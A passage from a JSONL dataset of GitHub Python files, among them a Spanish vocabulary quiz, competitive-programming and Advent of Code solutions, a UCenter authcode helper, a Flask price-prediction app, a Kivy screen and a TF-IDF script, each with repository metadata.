input(\"Please enter your name: \")\n print(\"\\nGathering words, just a moment please....\")\n\n\n quiz_words = Spanish.get_words(\" \")\n\n while play is True:\n\n for x in range(1):\n choices = sample(list(quiz_words),4)\n rword = choice(choices)\n\n question = \"What is the correct translation?\"\n\n print(f\"Total Points:{points}\\n\")\n print(f\"Question {ques}) {question}\\nWord: {rword}\\n\\n\")\n print(\"Choices: \")\n\n options = list(quiz_words[x] for x in choices)\n\n for i in range(len(options)):\n\n op = str(letters[i]) + \")\" + str(options[i])\n print(op)\n\n answer = input(\"\\nEnter answer a,b,c or d:\\nYour answer:\")\n\n print(\"\\n\")\n\n if answer.lower() in letters:\n\n if quiz_words[rword] == options[letters.index(answer.lower())]:\n points += 1\n\n print(\"Correct, plus 1 point!\")\n\n else:\n print(\"Incorrect\\n\")\n print(f\"The correct answer is '{quiz_words[rword]}'\") \n\n else:\n print(\"Enter a valid input\")\n\n\n print(f\"Total Points:{points}\\n\")\n again = input(\"Play again? y/n: \")\n print(\"\\n\\n\")\n\n if again == 'y' or again == 'Y' or again == 'yes' or again == 'Yes':\n ques += 1\n\n continue\n\n elif again == 'n' or again == 'N' or again == 'no' or again == 'No':\n \n conn = sq.connect('hiscores.db')\n \n perc = round(((int(points)/int(ques))*100),2)\n\n c = conn.cursor()\n\n c.execute(\"\"\"CREATE TABLE if not exists hiscores (Name text, Points int, Questions int, Percent real)\"\"\")\n\n new_row = [name,points,ques,perc]\n\n c.execute(\"INSERT INTO hiscores VALUES (?, ?, ?, ?)\", (new_row))\n\n conn.commit()\n\n conn.close()\n\n print(f\"{name} scored {points} point(s) off of {ques} question(s)\\n\")\n print(f\"Percent Correct:{perc}%\\n\")\n print(\"Saving score...\\n\")\n time.sleep(1)\n print(\"Thanks for playing\")\n play = False\n\n def top_points(self):\n \n conn = sq.connect('hiscores.db')\n\n df = pd.read_sql_query(\"SELECT * FROM hiscores ORDER BY Points DESC, Percent DESC\", conn)\n\n print(df.head())\n \n conn.close()\n \n def top_percent(self):\n \n conn = sq.connect('hiscores.db')\n\n df = pd.read_sql_query(\"SELECT * FROM hiscores ORDER BY Percent DESC, Questions DESC\", conn)\n\n print(df.head())\n \n conn.close()\n \n \n def top_questions(self):\n \n conn = sq.connect('hiscores.db')\n\n df = pd.read_sql_query(\"SELECT * FROM hiscores ORDER BY Questions DESC, Percent DESC\", conn)\n\n print(df.head())\n \n conn.close()\n \n def span_comp(self):\n\n print(\"Welcome\\n\")\n print(\"Starting up...\\n\")\n time.sleep(1)\n\n\n while True:\n time.sleep(1)\n print(\"\\nFunctions:\")\n print(\"1. Today's Word\")\n print(\"2. Yesterday's Word\")\n print(\"3. Words the last week\")\n print(\"4. Words the last month\")\n print(\"5. Words the last year\")\n print(\"6. Quiz\")\n print(\"7. Hiscores - Top Points\")\n print(\"8. Hiscores - Highest Correction %\")\n print(\"9. Hiscores - Most Questions\")\n print(\"10. Exit\")\n print(\"\\n\")\n time.sleep(1)\n choice = int(input(\"Which function would you like to use? 1/2/3/4/5/6/7/8/9/10: \"))\n print(\"\\n\")\n\n\n\n if choice == 1:\n print(\"\\nLoading...\\n\")\n time.sleep(1)\n Spanish.today(\" \")\n time.sleep(1)\n\n elif choice == 2:\n print(\"\\nLoading...\\n\")\n time.sleep(1)\n Spanish.yesterday(\" \")\n time.sleep(1)\n\n elif choice == 3:\n print(\"\\nLoading...\\n\")\n time.sleep(1)\n Spanish.week(\" \")\n time.sleep(1)\n\n elif choice == 4:\n print(\"\\nLoading...\\n\")\n time.sleep(1)\n Spanish.month(\" \")\n time.sleep(1)\n\n elif choice == 5:\n print(\"\\nLoading...\\n\")\n time.sleep(1)\n Spanish.year(\" \")\n time.sleep(1)\n \n elif choice == 6:\n print(\"\\nLoading...\\n\")\n time.sleep(1)\n Spanish.Quiz(\" \")\n time.sleep(1)\n \n elif choice == 7:\n print(\"\\nLoading...\\n\")\n time.sleep(1)\n Spanish.top_points(\" \")\n time.sleep(1)\n\n elif choice == 8:\n print(\"\\nLoading...\\n\")\n time.sleep(1)\n Spanish.top_percent(\" \")\n time.sleep(1)\n \n elif choice == 9:\n print(\"\\nLoading...\\n\")\n time.sleep(1)\n Spanish.top_questions(\" \")\n time.sleep(1)\n \n \n elif choice == 10:\n print(\"Shutting down...\\n\")\n time.sleep(1)\n print('Gracias!')\n time.sleep(1)\n break\n\n\n else:\n print(\"Not a valid input\") ","repo_name":"knedgen/Spanish_Learning_Repo","sub_path":"spantools.py","file_name":"spantools.py","file_ext":"py","file_size_in_byte":10142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25657560105","text":"import sys\n\nsys.setrecursionlimit(10 ** 7)\nrl = sys.stdin.readline\n\n\ndef solve():\n N, Q = map(int, rl().split())\n \n under = [-1] * N\n top = list(range(N))\n \n for _ in range(Q):\n f, t, x = map(lambda v: int(v) - 1, rl().split())\n top_f = top[f]\n top_t = top[t]\n top[f] = under[x]\n top[t] = top_f\n under[x] = top_t\n \n ans = [0] * N\n for idx, con in enumerate(top):\n if con == -1:\n continue\n c = con\n while c != -1:\n ans[c] = idx + 1\n c = under[c]\n print(*ans, sep='\\n')\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"yuly3/atcoder","sub_path":"other/past202005-open/K.py","file_name":"K.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25130395423","text":"# -*- coding=utf-8 -*-\n\nimport base64\nimport random\n\nfrom ucenter import *\n\nclass Configs(object):\n UC_KEY = ''\n UC_API = ''\n UC_CHARSET = 'utf-8'\n UC_IP = ''\n UC_APPID = ''\n UC_PPP = '20'\n\n UC_CLIENT_VERSION = '1.5.2'\n UC_CLIENT_RELEASE = '20101001'\n \ndef b64_encode(s):\n return base64.encodestring(s)\n \ndef b64_decode(s):\n try:\n return base64.decodestring(s)\n except:\n return b64_decode(s+\"=\")\n\ndef random_string(length):\n charArray = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'\n return ''.join([random.choice(charArray) for i in range(length)])\n\nclass Ucenter(object):\n ENCODE, DECODE = 0, 1\n\n @classmethod\n def authcode_encode(cls, string, key, expiry=0):\n return cls.authcode(string, key, cls.ENCODE, expiry)\n\n @classmethod\n def authcode_decode(cls, string, key, expiry=0):\n return cls.authcode(string, key, cls.DECODE, expiry)\n\n @classmethod\n def authcode(cls, string, key, operation, expiry=0):\n if not string:\n return ''\n \n ckey_length = 4\n key = md5(key or Configs.UC_KEY)\n keya = md5(key[:16])\n keyb = md5(key[16:])\n if ckey_length:\n if operation == cls.DECODE:\n keyc = string[:ckey_length]\n else:\n keyc = random_string(ckey_length)\n else:\n keyc = ''\n\n cryptkey = keya + md5(keya + keyc)\n key_length = len(cryptkey)\n\n if operation == cls.DECODE:\n string = b64_decode(string[ckey_length:])\n else:\n if expiry:\n expiry += now()\n string = '%10d' % expiry + md5(string + keyb)[:16] + string\n string_length = len(string)\n\n result = ''\n rndkey = [ord(cryptkey[i % key_length]) for i in range(256)]\n box = range(256)\n j = 0\n for i in xrange(256):\n j = (j + box[i] + rndkey[i]) % 256\n box[i], box[j] = box[j], box[i]\n\n a, j = 0, 0\n for i in xrange(string_length):\n a = (a + 1) % 256\n j = (j + box[a]) % 256\n box[a], box[j] = box[j], box[a]\n result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))\n\n if operation == cls.DECODE:\n if (int(result[:10]) == 0 or int(result[:10]) - now() > 0) \\\n and result[10:26] == md5(result[26:] + keyb)[:16]:\n return result[26:]\n else:\n return ''\n else:\n return keyc + b64_encode(result).replace('=', '')\n","repo_name":"ghoulr/ucenter","sub_path":"base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"48"} +{"seq_id":"19404655103","text":"from flask import Flask\r\nfrom flask import Flask, request, render_template\r\nimport pickle\r\nimport numpy as np\r\n\r\n\r\napp = Flask(__name__,template_folder='template')\r\ndef prediction(lst):\r\n filename = 'model/prediction_model_1.pickle'\r\n with open(filename,'rb') as file:\r\n model = pickle.load(file)\r\n pred_value = model.predict([lst])\r\n return pred_value\r\n\r\n\r\n\r\n@app.route('/',methods=['POST','GET'])\r\ndef index():\r\n pred = 0\r\n if request.method == 'POST':\r\n ram_gb = request.form['ram']\r\n brand = request.form['Brand']\r\n storage_gb= request.form['Storage']\r\n screen_size_inch = request.form['Screen Size']\r\n main_camera_mp = request.form['main_camera(MP)']\r\n camera_count = request.form['rear cameras count']\r\n battery_capacity_mah = request.form['Battery Capacity']\r\n\r\n feature_list =[]\r\n feature_list.append(int(ram_gb))\r\n feature_list.append(float(screen_size_inch))\r\n feature_list.append(int(storage_gb))\r\n feature_list.append(int(main_camera_mp))\r\n feature_list.append(int(camera_count))\r\n feature_list.append(int(battery_capacity_mah))\r\n\r\n brand_list = ['Samsung','Xiaomi','Oppo','Realme','Vivo','Apple','Nokia','Motorola','OnePlus','Huawei','Google','other']\r\n def traverse_list(lst, value):\r\n for item in lst:\r\n if item == value:\r\n feature_list.append(1)\r\n else:\r\n feature_list.append(0)\r\n\r\n traverse_list(brand_list, brand)\r\n\r\n pred = prediction(feature_list)\r\n pred = pred*-1\r\n pred = np.round(pred[0])\r\n print(pred)\r\n\r\n \r\n \r\n return render_template('index.html',pred = pred)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"MKDpahasara/Smartphone-Price-Prediction-Model-Using-Machine-Learning","sub_path":"Web App/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34259200882","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('visualizations', '0001_initial'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='query',\n name='visualization',\n ),\n migrations.AddField(\n model_name='visualization',\n name='query',\n field=models.OneToOneField(to='visualizations.Query', null=True),\n ),\n ]\n","repo_name":"aeud/sing","sub_path":"apps/visualizations/migrations/0002_auto_20151109_0521.py","file_name":"0002_auto_20151109_0521.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12458289562","text":"import re\nfrom enum import Enum\nfrom copy import deepcopy\nfrom pprint import pprint\nfrom functools import reduce, cmp_to_key\nfrom itertools import groupby, combinations, permutations\nfrom time import time\nfrom queue import PriorityQueue\nfrom math import prod, ceil, comb, perm\nfrom collections import defaultdict, Counter\nfrom dataclasses import dataclass\nfrom bisect import insort\nfrom operator import add, mul\nfrom functools import lru_cache\nimport numpy as np\nimport string\nimport sys\nfrom sys import exit\nfrom scipy.ndimage import generic_filter\n\nfile = sys.argv[1] if len(sys.argv) > 1 else \"ex1\"\nlines = list(map(lambda l: l.rstrip(), open(file + \".txt\").readlines()))\n\n# ----------------------------------------------------------------------\n# * Parsing(/setup)\n\nNB_EVEN = {\"w\": (0, -2),\n \"nw\": (1, -1),\n \"ne\": (1, 1),\n \"e\": (0, 2),\n \"se\": (0, 1),\n \"sw\": (0, -1)}\n\nNB_ODD = {\"w\": (0, -2),\n \"nw\": (0, -1),\n \"ne\": (0, 1),\n \"e\": (0, 2),\n \"se\": (-1, 1),\n \"sw\": (-1, -1)}\n\n# ----------------------------------------------------------------------\n# * Part 1\n\nflipped = defaultdict(lambda: False)\nminp = np.array([1000000, 1000000], dtype=int)\nmaxp = np.array([-1000000, -1000000], dtype=int)\n\nfor line in lines:\n pos = np.array([0, 0], dtype=int)\n\n pat = r\"(nw)|(ne)|(sw)|(se)|(w)|(e)\"\n for d in re.finditer(pat, line):\n if pos[1] % 2 == 0:\n pos += np.array(NB_EVEN[d.group()])\n else:\n pos += np.array(NB_ODD[d.group()])\n\n flipped[(pos[0], pos[1])] ^= True\n\n minp[0] = min(minp[0], pos[0])\n minp[1] = min(minp[1], pos[1])\n maxp[0] = max(maxp[0], pos[0])\n maxp[1] = max(maxp[1], pos[1])\n\nprint(\"Part 1: {}\".format(len([f for _, f in flipped.items() if f == True])))\n\n# ----------------------------------------------------------------------\n# * Part 2\n\ndef debug(floor):\n for row in floor:\n print(\" \".join([\"1\" if b else \"0\" for b in row]))\n\ndef flip(floor, days):\n for _ in range(days):\n floor = np.pad(floor, 4, constant_values=False)\n (m, n) = floor.shape\n flipped = floor.copy()\n for i in range(2, n-2):\n for j in range(2, m-2):\n dirs = NB_EVEN.values() if j % 2 == 0 else NB_ODD.values()\n\n adj = np.sum([floor[j + y][i + x] for x, y in dirs])\n\n if floor[j][i] == True:\n if adj == 0 or adj > 2:\n flipped[j][i] = False\n else:\n if adj == 2:\n flipped[j][i] = True\n floor = flipped\n debug(floor)\n\n return floor\n\n\nsize = np.array(maxp - minp + 1, dtype=int)\nfloor = np.zeros((size[1], size[0]), dtype=bool)\nfor x, y in flipped.keys():\n floor[y - minp[1]][x - minp[0]] = True\n\n\nif minp[1] % 2 == 1:\n floor = np.pad(floor, 1, constant_values=False)\n \npprint(flipped)\ndebug(floor)\n\nprint(\"Part 2: {}\", np.sum(flip(floor, 2)))\n","repo_name":"U32Float/AoC","sub_path":"2020/day24/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5654911097","text":"from kivymd.uix.screen import MDScreen\nfrom kivy.uix.screenmanager import ScreenManager\nfrom kivymd.uix.boxlayout import MDBoxLayout\nfrom kivymd.uix.textfield import MDTextField\nfrom kivymd.uix.button import MDTextButton\nfrom kivy.properties import Clock\n\n\n\nclass UserSetting(MDScreen):\n \n def update_email(self):\n icon_btn,email_obj = self.ids.email_container.children\n self.text_field = MDTextField(size_hint_x=0.5,text=self.ids.email.text)\n self.btn = MDTextButton(text=\"Update\",pos_hint={\"top\":0.5})\n self.ids.email_container.remove_widget(email_obj)\n self.ids.email_container.remove_widget(icon_btn)\n self.ids.email_container.add_widget(self.text_field)\n self.ids.email_container.add_widget(self.btn)\n self.ids.email_container.spacing = 20\n Clock.schedule_once(self.set_focus)\n \n def update_name(self):\n icon_btn,name_obj = self.ids.name_container.children\n self.text_field = MDTextField(text=self.ids.name.text)\n self.btn = MDTextButton(text=\"Update\",pos_hint={\"top\":0.5})\n self.ids.name_container.remove_widget(name_obj)\n self.ids.name_container.remove_widget(icon_btn)\n self.ids.name_container.add_widget(self.text_field,index=0)\n self.ids.name_container.add_widget(self.btn)\n self.ids.name_container.spacing = 20\n Clock.schedule_once(self.set_focus)\n\n def set_focus(self,*args):\n self.text_field.focus = True","repo_name":"marvelous-benji/kivy-client-server","sub_path":"Settings/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71189254546","text":"import math\nimport pickle\nimport pandas as pd\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom string import punctuation\n\n\ndef get_terms(email):\n \"\"\"1) Lowercase the email\n 2) Tokenize the email into words\n 3) Remove stop words and punctuation\n \"\"\"\n tokens = word_tokenize(email.lower())\n words_to_remove = stopwords.words(\"english\")\n words_to_remove.extend(list(punctuation))\n return [t for t in set(tokens) if not t in words_to_remove]\n\n\ndef get_term_doc(emails):\n \"\"\"Turn tokenized emails into a term-document dictionary\"\"\"\n term_doc = {}\n for i, email in enumerate(emails):\n for term in email:\n if term in term_doc:\n term_doc[term].add(i)\n else:\n term_doc[term] = {i}\n return term_doc\n\n\ndef compute_idfs(term_doc, corpus_size):\n \"\"\"\n Calculate idfs for all the terms\n idf = log2 (corpus size / doc freq)\n \"\"\"\n idfs = {}\n for term in term_doc:\n doc_freq = len(term_doc[term])\n idfs[term] = math.log2(corpus_size / doc_freq)\n return idfs\n\n\nif __name__ == \"__main__\":\n # reading in the E-mails from the Hillary Clinton email corpus\n emails = (pd.read_csv(\"Emails.csv\")\n [\"ExtractedBodyText\"]\n .dropna()\n .tolist())\n tokenized_emails = [get_terms(email) for email in emails]\n term_doc = get_term_doc(tokenized_emails)\n idfs = compute_idfs(term_doc, len(emails))\n\n # we will use this pickle in the get_tfidfs.py script\n with open(\"idf_results.p\", \"wb\") as idf_file:\n pickle.dump(idfs, idf_file)\n","repo_name":"etsuprun/text_mining_with_tfidf","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71389419666","text":"import sys\n\n\nname = __file__.split('\\\\')[-1][:-3]\nfile = open(f'{name}.txt', 'r')\nsys.stdin = file\ntest_case = int(input())\n\ndef search(bitt, idx, val):\n # if num == 3:\n # print(bin(bitt), idx, val)\n if val >= B:\n global minn\n minn = min(minn, val)\n return\n if not bitt:\n return \n search(bitt - (1 << idx) , idx + 1, val)\n if val + lst[idx] < minn:\n search(bitt - (1 << idx), idx + 1, val + lst[idx])\n\n \n\n\nfor num in range(test_case):\n return_value = 0\n N, B = map(int, input().split())\n lst = list(map(int, input().split()))\n minn = float('inf')\n search( (1 << N) - 1, 0, 0)\n\n print(f'#{num + 1} {minn - B}')\n # break","repo_name":"sangbumlikeagod/SSAFY","sub_path":"0922/heightchair.py","file_name":"heightchair.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1410787743","text":"import numpy as np\nfrom scipy.special import softmax\nfrom sklearn.tree import DecisionTreeClassifier\nimport lightgbm as lgb\nfrom sklearn.metrics import roc_auc_score\n\n\nclass TrAdaBoost:\n \"\"\"\n Implement TrAdaBoost\n To read more about the TrAdaBoost, check the following paper:\n Dai, Wenyuan, et al. \"Boosting for transfer learning.\" Proceedings of the 24th international conference on\n Machine learning. ACM, 2007.\n\n ps: Different from other implementations, use predict_proba instead of predict\n \"\"\"\n\n def __init__(self, learner, num_iterations):\n self.learner = learner\n self.num_iterations = num_iterations\n self.beta_t = None\n self.models = []\n\n def fit(self, x_target, x_source, y_target, y_source):\n row_source = x_source.shape[0]\n row_target = x_target.shape[0]\n\n x_trans = np.concatenate((x_source, x_target), axis=0)\n y_trans = np.concatenate((y_source, y_target), axis=0)\n\n x_trans = np.asarray(x_trans)\n y_trans = np.asarray(y_trans)\n\n beta = 1 / (1 + np.sqrt(2 * np.log(row_source / self.num_iterations)))\n self.beta_t = np.zeros([self.num_iterations, 1])\n\n # 初始化权重\n weight_source = np.ones([row_source, 1]) / row_source\n weight_target = np.ones([row_target, 1]) / row_target\n weights = np.concatenate((weight_source, weight_target), axis=0)\n\n for i in range(self.num_iterations):\n sample_weights = self._calculate_weight(weights)\n self.learner.fit(x_trans, y_trans, sample_weights[:, 0])\n self.models.append(self.learner)\n result = self.learner.predict_proba(x_trans)[:, 1]\n error_rate = self._calculate_error_rate(y_target, result[row_source:row_source + row_target],\n weights[row_source:row_source + row_target])\n\n if error_rate > 0.5:\n error_rate = 0.5\n if error_rate == 0:\n self.num_iterations = i\n break # 防止过拟合\n\n self.beta_t[i] = error_rate / (1 - error_rate)\n\n # 调整源域样本权重\n for j in range(row_source):\n weights[j] = weights[j] * np.power(beta, (np.abs(result[j] - y_source[j])))\n\n # 调整目标域样本权重\n for j in range(row_target):\n weights[row_source + j] = weights[row_source + j] * np.power(self.beta_t[i],\n (-np.abs(\n result[row_source + j] - y_target[j])))\n\n @staticmethod\n def _calculate_weight(weights):\n sum_weight = np.sum(weights)\n return np.asarray(weights / sum_weight)\n\n @staticmethod\n def _calculate_error_rate(y_target, y_predict, weight):\n total = np.sum(weight)\n return np.sum(weight[:, 0] / total * np.abs(y_target - y_predict))\n\n def predict(self, x_test):\n row_test = x_test.shape[0]\n result = np.ones([row_test, self.num_iterations])\n predict = np.ones([row_test, 1])\n for i in range(self.num_iterations):\n result[:, i] = self.models[i].predict_proba(x_test)[:, 1]\n for i in range(row_test):\n left = np.sum(result[i, int(np.ceil(self.num_iterations / 2)):self.num_iterations] * np.log(\n 1 / self.beta_t[int(np.ceil(self.num_iterations / 2)):self.num_iterations]))\n right = 0.5 * np.sum(\n np.log(1 / self.beta_t[int(np.ceil(self.num_iterations / 2)):self.num_iterations]))\n if left >= right:\n predict[i] = 1\n else:\n predict[i] = 0\n return predict\n\n def predict_proba(self, x_test):\n \"\"\"\n 与其他实现不同的是加了softmax函数\n \"\"\"\n row_test = x_test.shape[0]\n result = np.ones([row_test, self.num_iterations])\n predict = np.ones([row_test, 2])\n for i in range(self.num_iterations):\n result[:, i] = self.models[i].predict_proba(x_test)[:, 1]\n for i in range(row_test):\n left = np.sum(result[i, int(np.ceil(self.num_iterations / 2)):self.num_iterations] * np.log(\n 1 / self.beta_t[int(np.ceil(self.num_iterations / 2)):self.num_iterations]))\n right = 0.5 * np.sum(\n np.log(1 / self.beta_t[int(np.ceil(self.num_iterations / 2)):self.num_iterations]))\n predict[i] = softmax([right, left])\n return predict\n\n\nif __name__ == '__main__':\n # Generate data\n np.random.seed(0)\n # Generate training source data\n ns = 200\n ns_perclass = ns // 2\n mean_1 = (1, 1)\n var_1 = np.diag([1, 1])\n mean_2 = (3, 3)\n var_2 = np.diag([2, 2])\n Xs = np.r_[np.random.multivariate_normal(mean_1, var_1, size=ns_perclass),\n np.random.multivariate_normal(mean_2, var_2, size=ns_perclass)]\n ys = np.zeros(ns)\n ys[ns_perclass:] = 1\n # Generate training target data\n nt = 50\n # imbalanced\n nt_0 = nt // 10\n mean_1 = (6, 3)\n var_1 = np.diag([4, 1])\n mean_2 = (5, 5)\n var_2 = np.diag([1, 3])\n Xt = np.r_[np.random.multivariate_normal(mean_1, var_1, size=nt_0),\n np.random.multivariate_normal(mean_2, var_2, size=nt - nt_0)]\n yt = np.zeros(nt)\n yt[nt_0:] = 1\n # Generate testing target data\n nt_test = 1000\n nt_test_perclass = nt_test // 2\n Xt_test = np.r_[np.random.multivariate_normal(mean_1, var_1, size=nt_test_perclass),\n np.random.multivariate_normal(mean_2, var_2, size=nt_test_perclass)]\n yt_test = np.zeros(nt_test)\n yt_test[nt_test_perclass:] = 1\n\n # transfer learning\n lightgbm_learner = lgb.LGBMClassifier(max_depth=3, n_estimators=100)\n trc = TrAdaBoost(learner=lightgbm_learner, num_iterations=5)\n trc.fit(Xt, Xs, yt, ys)\n print('lightgbm learner')\n print('train target auc: ', roc_auc_score(y_true=yt, y_score=trc.predict_proba(Xt)[:, 1]))\n print('test auc: ', roc_auc_score(y_true=yt_test, y_score=trc.predict_proba(Xt_test)[:, 1]))\n\n decision_tree_learner = DecisionTreeClassifier(max_depth=3)\n trc = TrAdaBoost(learner=decision_tree_learner, num_iterations=5)\n trc.fit(Xt, Xs, yt, ys)\n print('decision_tree learner')\n print('train target auc: ', roc_auc_score(y_true=yt, y_score=trc.predict_proba(Xt)[:, 1]))\n print('test auc: ', roc_auc_score(y_true=yt_test, y_score=trc.predict_proba(Xt_test)[:, 1]))\n","repo_name":"wuboyu88/transfer_learning","sub_path":"tradaboost.py","file_name":"tradaboost.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73570141906","text":"#!/usr/bin/python3\nimport init\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\nl=logging.getLogger(__name__)\nclass Person:\n def __init__(self, user_id, friends_recursion=0,no_update_self=False):\n self.id=user_id\n self.first_name=...\n self.last_name=...\n self.screen_name=...\n self.friends=...\n if not no_update_self:\n self.update_self()\n if friends_recursion>0:\n self.update_friends(friends_recursion)\n def update_self(self):\n l.debug('Hitting VK for info on user id_{}...'.format(self.id))\n try:\n obj = init.api.users.get(user_ids=self.id,fields='screen_name')[0]\n self.first_name=obj['first_name']\n self.last_name=obj['last_name']\n self.screen_name=obj['screen_name']\n except init.vk_api.VkApiError:\n l.exception('Failed to get info for user id_{}!'.format(self.id))\n def update_friends(self, depth=0):\n l.info('Updating friends with depth {}!'.format(depth))\n l.debug('Looking at friends of user id_{}...'.format(self.id))\n try:\n for i in init.api.friends.get(user_id=self.id,fields='screen_name')['items']:\n p=Person(i['id'],depth-1,True)\n if self.friends is ...:\n self.friends=[]\n if 'deactivated' not in i:\n p.first_name=i['first_name']\n p.last_name=i['last_name']\n p.screen_name=i['screen_name']\n self.friends.append(p)\n except init.vk_api.VkApiError:\n l.exception('Getting friends failed!')\n def print_recursive(self,started_from,limit_depth=None,current_depth=0):\n if current_depth==limit_depth:\n print(f'{\" \"*current_depth}{self.first_name} {self.last_name} (@{self.screen_name}, id_{self.id}).')\n return 0\n print(f'{\" \"*current_depth}{self.first_name} {self.last_name} (@{self.screen_name}, id_{self.id})' + (f' has {len(self.friends) if isinstance(self.friends, list) else \"an unknown number of\"} friend{\"\" if isinstance(self.friends, list) and len(self.friends)==1 else \"s\"}{\":\" if isinstance(self.friends, list) and len(self.friends)>0 else \".\"}' if self.friends is not ... else '.'))\n if isinstance(self.friends, list) and len(self.friends)>0:\n for i in self.friends:\n i.print_recursive(started_from,limit_depth if self.id not in started_from else current_depth+1, current_depth+1)\n\n def test_paradox(self):\n l.info(f'{self.first_name} {self.last_name} (@{self.screen_name}, id_{self.id}) has {len(self.friends)} friend{\"\" if len(self.friends)==1 else \"s\"}.')\n s=0\n c=0\n for i in self.friends:\n if i.friends is not ...:\n s+=len(i.friends)\n c+=1\n l.info(f'Of those, the friend counts could be acquired for {c} friends.')\n l.info(f'In total, those friends have {s} friends including the origin.')\n avg=s/c\n l.info(f'This results in {avg} friends per friend, which is {\"more\" if avg>len(self.friends) else \"less\"} than the origin\\'s friend count.')\n l.warn(f'The paradox {\"checks out\" if avg>len(self.friends) else \"does not check out\"}.')\n\nif __name__=='__main__':\n me = Person(input('Your ID:'),2)\n s=[]\n me.print_recursive(s)\n me.test_paradox()\n \n","repo_name":"danya02/slon-winter-2019-intro","sub_path":"friendship-paradox/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30931576732","text":"from time import sleep\nvalor1 = int(input('Digite o 1° valor: '))\nvalor2 = int(input('Digite o 2° valor: '))\nopção = 0\nwhile opção != 5:\n print(\"\"\"************************\n[1] Somar\n[2] Multiplicar\n[3] Maior\n[4] Novos números\n[5] Sair do programa\n************************\"\"\")\n opção = str(input('>>>> Informe a opção desejada: ')).strip()\n if opção in '12345':\n opção = int(opção)\n if opção == 1:\n soma = valor1 + valor2\n print(' {} + {} = {}'.format(valor1, valor2, soma))\n if opção == 2:\n mult = valor1 * valor2\n print('{} x {} = {}'.format(valor1, valor2, mult))\n if opção == 3:\n if valor2 != valor1:\n maior = max((valor1, valor2))\n print('O maior valor entre {} e {} é {}'.format(valor1, valor2, maior))\n else:\n print('Os valores são iguais!')\n if opção == 4:\n valor1 = int(input('Digite o 1° valor: '))\n valor2 = int(input('Digite o 2° valor: '))\n if opção == 5:\n print('Aguarde enquanto finalizamos o programa')\n print('Finalizando...')\n else:\n print('Opção inválida. Tente novamente')\nsleep(3)\nprint('Obrigado por usar o nosso programa. Volte sempre!')","repo_name":"dlimatiago/python-cev","sub_path":"curso-aula_em_video/Ex 059 - Criando um menu de opções.py","file_name":"Ex 059 - Criando um menu de opções.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73536301587","text":"from typing import Union\n\n\nfrom typing import Union\n\n\n\nclass Archive:\n\n _instance = None\n\n def __new__(cls, *args, **kwargs):\n if cls._instance is None:\n cls._instance = super().__new__(cls)\n cls._instance.archive_text = []\n cls._instance.archive_number = []\n else:\n cls._instance.archive_text.append(cls._instance.text)\n cls._instance.archive_number.append(cls._instance.number)\n return cls._instance\n\n def __init__(self, text: str, number: Union[int, float]):\n if not isinstance(text, str) or not text:\n raise InvalidTextError(text)\n if not isinstance(number, (int, float)) or number <= 0:\n raise InvalidNumberError(number)\n self.text = text\n self.number = number\n\n def __str__(self):\n return f'Text is {self.text} and number is {self.number}. Also {self.archive_text} and {self.archive_number}'\n\n def __repr__(self):\n return f'Archive(\"{self.text}\", {self.number})'\n\nclass InvalidTextError(Exception):\n def __init__(self, text):\n self.text = text\n super().__init__(f\"Invalid text: {self.text}. Text should be a non-empty string.\")\n\n\nclass InvalidNumberError(Exception):\n def __init__(self, number):\n self.number = number\n super().__init__(f\"Invalid number: {self.number}. Number should be a positive integer or float.\")\n\n# help(Archive)\narchive = Archive(\"дом\", 5)\narchive_2 = Archive(6, 7)\nprint(archive)\n\nprint(repr(archive_2))\n# print(archive.archive_text)\n# print(archive_2.archive_numbers)","repo_name":"ValeryBurlakov/python_based","sub_path":"homeworks/homework_13/test_2.py","file_name":"test_2.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13553245984","text":"\"\"\"\nfibompibatch.py\n\nDescription: This computes the fibonacci sequence for multiple inputs\n\t using a parallel process (4 cores at a time)\n\t \n\t Basic fibonacci sequence calculation\n\t\tbase case: \t\t\n\t\tf(1) = 1\t\n\t\tf(2) = 1\n\t\trecursion: \n\t\tf(n) = f(n-1) + f(n-2) , n > 2 \n\nUsage: \t mpirun -n 4 python3 fibompibatch.py 